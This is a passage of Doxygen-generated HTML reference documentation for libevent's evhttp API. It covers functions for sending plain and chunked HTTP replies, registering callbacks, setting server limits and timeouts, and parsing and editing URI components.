<td class="paramtype">struct <a class="el" href="structevbuffer.html">evbuffer</a> * </td>
<td class="paramname"><em>databuf</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Send an HTML reply to the client.</p>
<p>The body of the reply consists of the data in databuf. After calling <a class="el" href="http_8h.html#a9df5ec9adc9bc664db5d6b161a293525">evhttp_send_reply()</a> databuf will be empty, but the buffer is still owned by the caller and needs to be deallocated by the caller if necessary.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">req</td><td>a request object </td></tr>
<tr><td class="paramname">code</td><td>the HTTP response code to send </td></tr>
<tr><td class="paramname">reason</td><td>a brief message to send with the response code </td></tr>
<tr><td class="paramname">databuf</td><td>the body of the response </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a7950f70e66678fda56fdf8288811639c"></a><!-- doxytag: member="http.h::evhttp_send_reply_chunk" ref="a7950f70e66678fda56fdf8288811639c" args="(struct evhttp_request *req, struct evbuffer *databuf)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a7950f70e66678fda56fdf8288811639c">evhttp_send_reply_chunk</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">struct <a class="el" href="structevbuffer.html">evbuffer</a> * </td>
<td class="paramname"><em>databuf</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Send another data chunk as part of an ongoing chunked reply.</p>
<p>The reply chunk consists of the data in databuf. After calling <a class="el" href="http_8h.html#a7950f70e66678fda56fdf8288811639c">evhttp_send_reply_chunk()</a> databuf will be empty, but the buffer is still owned by the caller and needs to be deallocated by the caller if necessary.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">req</td><td>a request object </td></tr>
<tr><td class="paramname">databuf</td><td>the data chunk to send as part of the reply. </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a77024706313626c5857089b08ec5e0ae"></a><!-- doxytag: member="http.h::evhttp_send_reply_end" ref="a77024706313626c5857089b08ec5e0ae" args="(struct evhttp_request *req)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a77024706313626c5857089b08ec5e0ae">evhttp_send_reply_end</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Complete a chunked reply, freeing the request as appropriate.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">req</td><td>a request object </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a69c93aab46133521997cdfb8c2e07195"></a><!-- doxytag: member="http.h::evhttp_send_reply_start" ref="a69c93aab46133521997cdfb8c2e07195" args="(struct evhttp_request *req, int code, const char *reason)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a69c93aab46133521997cdfb8c2e07195">evhttp_send_reply_start</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td>
<td class="paramname"><em>req</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>code</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>reason</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Initiate a reply that uses Transfer-Encoding chunked.</p>
<p>This allows the caller to stream the reply back to the client and is useful when either not all of the reply data is immediately available or when sending very large replies.</p>
<p>The caller needs to supply data chunks with <a class="el" href="http_8h.html#a7950f70e66678fda56fdf8288811639c">evhttp_send_reply_chunk()</a> and complete the reply by calling <a class="el" href="http_8h.html#a77024706313626c5857089b08ec5e0ae">evhttp_send_reply_end()</a>.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">req</td><td>a request object </td></tr>
<tr><td class="paramname">code</td><td>the HTTP response code to send </td></tr>
<tr><td class="paramname">reason</td><td>a brief message to send with the response code </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="ae63a0370f59570e00753f7fb512a7f59"></a><!-- doxytag: member="http.h::evhttp_set_allowed_methods" ref="ae63a0370f59570e00753f7fb512a7f59" args="(struct evhttp *http, ev_uint16_t methods)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#ae63a0370f59570e00753f7fb512a7f59">evhttp_set_allowed_methods</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_uint16_t </td>
<td class="paramname"><em>methods</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Sets the what HTTP methods are supported in requests accepted by this server, and passed to user callbacks.</p>
<p>If not supported they will generate a "405 Method not allowed" response.</p>
<p>By default this includes the following methods: GET, POST, HEAD, PUT, DELETE</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the http server on which to set the methods </td></tr>
<tr><td class="paramname">methods</td><td>bit mask constructed from evhttp_cmd_type values </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a5b685afe43d7f4c3bfcc7dcba72d41e0"></a><!-- doxytag: member="http.h::evhttp_set_cb" ref="a5b685afe43d7f4c3bfcc7dcba72d41e0" args="(struct evhttp *http, const char *path, void(*cb)(struct evhttp_request *, void *), void *cb_arg)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a5b685afe43d7f4c3bfcc7dcba72d41e0">evhttp_set_cb</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>path</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void(*)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *) </td>
<td class="paramname"><em>cb</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void * </td>
<td class="paramname"><em>cb_arg</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set a callback for a specified URI</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the http sever on which to set the callback </td></tr>
<tr><td class="paramname">path</td><td>the path for which to invoke the callback </td></tr>
<tr><td class="paramname">cb</td><td>the callback function that gets invoked on requesting path </td></tr>
<tr><td class="paramname">cb_arg</td><td>an additional context argument for the callback </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, -1 if the callback existed already, -2 on failure </dd></dl>
</div>
</div>
<a class="anchor" id="ad3466287c0054d32dfd538a3bdfb0374"></a><!-- doxytag: member="http.h::evhttp_set_gencb" ref="ad3466287c0054d32dfd538a3bdfb0374" args="(struct evhttp *http, void(*cb)(struct evhttp_request *, void *), void *arg)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#ad3466287c0054d32dfd538a3bdfb0374">evhttp_set_gencb</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void(*)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *) </td>
<td class="paramname"><em>cb</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">void * </td>
<td class="paramname"><em>arg</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set a callback for all requests that are not caught by specific callbacks</p>
<p>Invokes the specified callback for all requests that do not match any of the previously specified request paths. This is catchall for requests not specifically configured with <a class="el" href="http_8h.html#a5b685afe43d7f4c3bfcc7dcba72d41e0">evhttp_set_cb()</a>.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>the evhttp server object for which to set the callback </td></tr>
<tr><td class="paramname">cb</td><td>the callback to invoke for any unmatched requests </td></tr>
<tr><td class="paramname">arg</td><td>an context argument for the callback </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a8406065dcb34f9a058b2a7a6988ac351"></a><!-- doxytag: member="http.h::evhttp_set_max_body_size" ref="a8406065dcb34f9a058b2a7a6988ac351" args="(struct evhttp *http, ev_ssize_t max_body_size)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a8406065dcb34f9a058b2a7a6988ac351">evhttp_set_max_body_size</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_ssize_t </td>
<td class="paramname"><em>max_body_size</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>XXX Document. </p>
</div>
</div>
<a class="anchor" id="ae936aa6e7b0cb9617d0548a952db93cf"></a><!-- doxytag: member="http.h::evhttp_set_max_headers_size" ref="ae936aa6e7b0cb9617d0548a952db93cf" args="(struct evhttp *http, ev_ssize_t max_headers_size)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#ae936aa6e7b0cb9617d0548a952db93cf">evhttp_set_max_headers_size</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">ev_ssize_t </td>
<td class="paramname"><em>max_headers_size</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>XXX Document. </p>
</div>
</div>
<a class="anchor" id="acc8bb4d9e196f957510b5db9f6a02e44"></a><!-- doxytag: member="http.h::evhttp_set_timeout" ref="acc8bb4d9e196f957510b5db9f6a02e44" args="(struct evhttp *http, int timeout_in_secs)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#acc8bb4d9e196f957510b5db9f6a02e44">evhttp_set_timeout</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp.html">evhttp</a> * </td>
<td class="paramname"><em>http</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>timeout_in_secs</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the timeout for an HTTP request.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">http</td><td>an evhttp object </td></tr>
<tr><td class="paramname">timeout_in_secs</td><td>the timeout, in seconds </td></tr>
</table>
</dd>
</dl>
</div>
</div>
<a class="anchor" id="a5ee82311278b8fda3ed93a8e358683bb"></a><!-- doxytag: member="http.h::evhttp_uri_free" ref="a5ee82311278b8fda3ed93a8e358683bb" args="(struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#a5ee82311278b8fda3ed93a8e358683bb">evhttp_uri_free</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Free all memory allocated for a parsed uri. Only use this for URIs generated by evhttp_uri_parse.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">uri</td><td>container with parsed data </td></tr>
</table>
</dd>
</dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a47bc072177c8e839083c511a618a422c">evhttp_uri_parse()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="ad7fcd64c02bb074bc9c754e8107550c1"></a><!-- doxytag: member="http.h::evhttp_uri_get_fragment" ref="ad7fcd64c02bb074bc9c754e8107550c1" args="(const struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#ad7fcd64c02bb074bc9c754e8107550c1">evhttp_uri_get_fragment</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the fragment part of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a> (excluding the leading "#"), or NULL if it has no fragment set </p>
</div>
</div>
<a class="anchor" id="a2d45134ab552432fbe25eb2ff646f906"></a><!-- doxytag: member="http.h::evhttp_uri_get_host" ref="a2d45134ab552432fbe25eb2ff646f906" args="(const struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#a2d45134ab552432fbe25eb2ff646f906">evhttp_uri_get_host</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the host part of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or NULL if it has no host set. The host may either be a regular hostname (conforming to the RFC 3986 "regname" production), or an IPv4 address, or the empty string, or a bracketed IPv6 address, or a bracketed 'IP-Future' address.</p>
<p>Note that having a NULL host means that the URI has no authority section, but having an empty-string host means that the URI has an authority section with no host part. For example, "mailto:user@example.com" has a host of NULL, but "file:///etc/motd" has a host of "". </p>
</div>
</div>
<a class="anchor" id="a49e685022515780b3dfb4d944b4cce4d"></a><!-- doxytag: member="http.h::evhttp_uri_get_path" ref="a49e685022515780b3dfb4d944b4cce4d" args="(const struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#a49e685022515780b3dfb4d944b4cce4d">evhttp_uri_get_path</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the path part of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or NULL if it has no path set </p>
</div>
</div>
<a class="anchor" id="a60d456504f4f93f61384eb0b526f5a4c"></a><!-- doxytag: member="http.h::evhttp_uri_get_port" ref="a60d456504f4f93f61384eb0b526f5a4c" args="(const struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a60d456504f4f93f61384eb0b526f5a4c">evhttp_uri_get_port</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the port part of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or -1 if there is no port set. </p>
</div>
</div>
<a class="anchor" id="a9a8c53b664a23dbdebd99d768a17590e"></a><!-- doxytag: member="http.h::evhttp_uri_get_query" ref="a9a8c53b664a23dbdebd99d768a17590e" args="(const struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#a9a8c53b664a23dbdebd99d768a17590e">evhttp_uri_get_query</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the query part of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a> (excluding the leading "?"), or NULL if it has no query set </p>
</div>
</div>
<a class="anchor" id="a6f49cc20f421d2f66907c613d24ad3dc"></a><!-- doxytag: member="http.h::evhttp_uri_get_scheme" ref="a6f49cc20f421d2f66907c613d24ad3dc" args="(const struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#a6f49cc20f421d2f66907c613d24ad3dc">evhttp_uri_get_scheme</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the scheme of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or NULL if there is no scheme has been set and the <a class="el" href="structevhttp__uri.html">evhttp_uri</a> contains a Relative-Ref. </p>
</div>
</div>
<a class="anchor" id="adfc9eeca8691a9f55dad523e60f1a467"></a><!-- doxytag: member="http.h::evhttp_uri_get_userinfo" ref="adfc9eeca8691a9f55dad523e60f1a467" args="(const struct evhttp_uri *uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const char* <a class="el" href="http_8h.html#adfc9eeca8691a9f55dad523e60f1a467">evhttp_uri_get_userinfo</a> </td>
<td>(</td>
<td class="paramtype">const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return the userinfo part of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or NULL if it has no userinfo set. </p>
</div>
</div>
<a class="anchor" id="a60f7217fccc2bdfb9cb6abeb1c4ad102"></a><!-- doxytag: member="http.h::evhttp_uri_join" ref="a60f7217fccc2bdfb9cb6abeb1c4ad102" args="(struct evhttp_uri *uri, char *buf, size_t limit)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">char* <a class="el" href="http_8h.html#a60f7217fccc2bdfb9cb6abeb1c4ad102">evhttp_uri_join</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">char * </td>
<td class="paramname"><em>buf</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">size_t </td>
<td class="paramname"><em>limit</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Join together the uri parts from parsed data to form a URI-Reference.</p>
<p>Note that no escaping of reserved characters is done on the members of the <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, so the generated string might not be a valid URI unless the members of <a class="el" href="structevhttp__uri.html">evhttp_uri</a> are themselves valid.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">uri</td><td>container with parsed data </td></tr>
<tr><td class="paramname">buf</td><td>destination buffer </td></tr>
<tr><td class="paramname">limit</td><td>destination buffer size </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>an joined uri as string or NULL on error </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a47bc072177c8e839083c511a618a422c">evhttp_uri_parse()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="a2847be10a24befd3c65d412690475110"></a><!-- doxytag: member="http.h::evhttp_uri_new" ref="a2847be10a24befd3c65d412690475110" args="(void)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a>* <a class="el" href="http_8h.html#a2847be10a24befd3c65d412690475110">evhttp_uri_new</a> </td>
<td>(</td>
<td class="paramtype">void </td>
<td class="paramname"></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Return a new empty <a class="el" href="structevhttp__uri.html">evhttp_uri</a> with no fields set. </p>
</div>
</div>
<a class="anchor" id="a47bc072177c8e839083c511a618a422c"></a><!-- doxytag: member="http.h::evhttp_uri_parse" ref="a47bc072177c8e839083c511a618a422c" args="(const char *source_uri)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a>* <a class="el" href="http_8h.html#a47bc072177c8e839083c511a618a422c">evhttp_uri_parse</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>source_uri</em></td><td>)</td>
<td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Alias for evhttp_uri_parse_with_flags(source_uri, 0) </p>
</div>
</div>
<a class="anchor" id="ad9f9447cb1c3c92e40478b98ff30db60"></a><!-- doxytag: member="http.h::evhttp_uri_parse_with_flags" ref="ad9f9447cb1c3c92e40478b98ff30db60" args="(const char *source_uri, unsigned flags)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a>* <a class="el" href="http_8h.html#ad9f9447cb1c3c92e40478b98ff30db60">evhttp_uri_parse_with_flags</a> </td>
<td>(</td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>source_uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">unsigned </td>
<td class="paramname"><em>flags</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td><code> [read]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Helper function to parse a URI-Reference as specified by RFC3986.</p>
<p>This function matches the URI-Reference production from RFC3986, which includes both URIs like</p>
<p>scheme://[[userinfo]@]foo.com[:port]]/[path][?query][#fragment]</p>
<p>and relative-refs like</p>
<p>[path][?query][#fragment]</p>
<p>Any optional elements portions not present in the original URI are left set to NULL in the resulting <a class="el" href="structevhttp__uri.html">evhttp_uri</a>. If no port is specified, the port is set to -1.</p>
<p>Note that no decoding is performed on percent-escaped characters in the string; if you want to parse them, use evhttp_uridecode or evhttp_parse_query_str as appropriate.</p>
<p>Note also that most URI schemes will have additional constraints that this function does not know about, and cannot check. For example, mailto://www.example.com/cgi-bin/fortune.pl is not a reasonable mailto url, <a href="http://www.example.com:99999/">http://www.example.com:99999/</a> is not a reasonable HTTP URL, and <a href="ftp:username@example.com">ftp:username@example.com</a> is not a reasonable FTP URL. Nevertheless, all of these URLs conform to RFC3986, and this function accepts all of them as valid.</p>
<dl class="params"><dt><b>Parameters:</b></dt><dd>
<table class="params">
<tr><td class="paramname">source_uri</td><td>the request URI </td></tr>
<tr><td class="paramname">flags</td><td>Zero or more EVHTTP_URI_* flags to affect the behavior of the parser. </td></tr>
</table>
</dd>
</dl>
<dl class="return"><dt><b>Returns:</b></dt><dd>uri container to hold parsed data, or NULL if there is error </dd></dl>
<dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="http_8h.html#a5ee82311278b8fda3ed93a8e358683bb">evhttp_uri_free()</a> </dd></dl>
</div>
</div>
<a class="anchor" id="aea0b990f1ca5ba71feffa96c8f6bd06b"></a><!-- doxytag: member="http.h::evhttp_uri_set_flags" ref="aea0b990f1ca5ba71feffa96c8f6bd06b" args="(struct evhttp_uri *uri, unsigned flags)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">void <a class="el" href="http_8h.html#aea0b990f1ca5ba71feffa96c8f6bd06b">evhttp_uri_set_flags</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">unsigned </td>
<td class="paramname"><em>flags</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Changes the flags set on a given URI. See EVHTTP_URI_* for a list of flags. </p>
</div>
</div>
<a class="anchor" id="a36b844028058c82b6709d1e0fe7e1cf9"></a><!-- doxytag: member="http.h::evhttp_uri_set_fragment" ref="a36b844028058c82b6709d1e0fe7e1cf9" args="(struct evhttp_uri *uri, const char *fragment)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a36b844028058c82b6709d1e0fe7e1cf9">evhttp_uri_set_fragment</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>fragment</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the fragment of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or clear the fragment if fragment==NULL. The fragment should not include a leading "#". Returns 0 on success, -1 if fragment is not well-formed. </p>
</div>
</div>
<a class="anchor" id="a103c447efb9f41a5897b3aa130424734"></a><!-- doxytag: member="http.h::evhttp_uri_set_host" ref="a103c447efb9f41a5897b3aa130424734" args="(struct evhttp_uri *uri, const char *host)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a103c447efb9f41a5897b3aa130424734">evhttp_uri_set_host</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>host</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the host of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or clear the host if host==NULL. Returns 0 on success, -1 if host is not well-formed. </p>
</div>
</div>
<a class="anchor" id="ae6bbfc5cf62df674ba72800ea46c5828"></a><!-- doxytag: member="http.h::evhttp_uri_set_path" ref="ae6bbfc5cf62df674ba72800ea46c5828" args="(struct evhttp_uri *uri, const char *path)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#ae6bbfc5cf62df674ba72800ea46c5828">evhttp_uri_set_path</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const char * </td>
<td class="paramname"><em>path</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the path of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or clear the path if path==NULL. Returns 0 on success, -1 if path is not well-formed. </p>
</div>
</div>
<a class="anchor" id="a8cc430f9b8fb4c6aa11692d5ef0b383c"></a><!-- doxytag: member="http.h::evhttp_uri_set_port" ref="a8cc430f9b8fb4c6aa11692d5ef0b383c" args="(struct evhttp_uri *uri, int port)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#a8cc430f9b8fb4c6aa11692d5ef0b383c">evhttp_uri_set_port</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
<td class="paramname"><em>uri</em>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">int </td>
<td class="paramname"><em>port</em> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Set the port of an <a class="el" href="structevhttp__uri.html">evhttp_uri</a>, or clear the port if port==-1. Returns 0 on success, -1 if port is not well-formed. </p>
</div>
</div>
<a class="anchor" id="aaf999637136bc1785e5d75c191c671ba"></a><!-- doxytag: member="http.h::evhttp_uri_set_query" ref="aaf999637136bc1785e5d75c191c671ba" args="(struct evhttp_uri *uri, const char *query)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">int <a class="el" href="http_8h.html#aaf999637136bc1785e5d75c191c671ba">evhttp_uri_set_query</a> </td>
<td>(</td>
<td class="paramtype">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td>
